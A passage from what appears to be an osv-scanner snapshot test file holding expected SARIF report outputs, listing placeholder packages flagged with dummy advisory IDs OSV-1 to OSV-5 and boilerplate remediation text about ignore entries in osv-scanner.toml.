"roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": 
{ "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.2' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.4.1' is vulnerable to 'OSV-3'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.4.1' is vulnerable to 'OSV-5'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 
1.2.2 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## 
[OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" 
} }, { "deprecatedIds": [ "OSV-3" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-3](https://osv.dev/OSV-3)**.\n\n## [OSV-3](https://osv.dev/OSV-3)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-3\"\nreason 
= \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-3", "name": "OSV-3", "relationships": [], "shortDescription": { "markdown": "OSV-3: Something mildly scary!", "text": "OSV-3: Something mildly scary!" } }, { "deprecatedIds": [ "OSV-5" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-5](https://osv.dev/OSV-5)**.\n\n## [OSV-5](https://osv.dev/OSV-5)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| sbom:/path/to/my/second/lockfile | mine3 | 0.4.1 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not 
affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-5\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-5", "name": "OSV-5", "relationships": [], "shortDescription": { "markdown": "OSV-5: Something scarier!", "text": "OSV-5: Something scarier!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": 
"2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/third/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/third/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these 
values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n| unknown:/path/to/my/third/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n`/path/to/my/third/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason 
= \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] }, { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/second/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.2' is vulnerable to 'OSV-1'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine2@3.2.5' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-3'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-3", "ruleIndex": 2, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author1/mine1@1.2.3' is vulnerable to 'OSV-5'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/second/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'author3/mine3@0.4.1' is vulnerable to 'OSV-5'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-5", "ruleIndex": 3, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | author1/mine1 | 1.2.3 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | 
author1/mine1 | 1.2.3 |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.2 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## 
[OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| sbom:/path/to/my/second/lockfile | mine2 | 3.2.5 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/second/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2: Something less scary!", "text": "OSV-2: Something less scary!" 
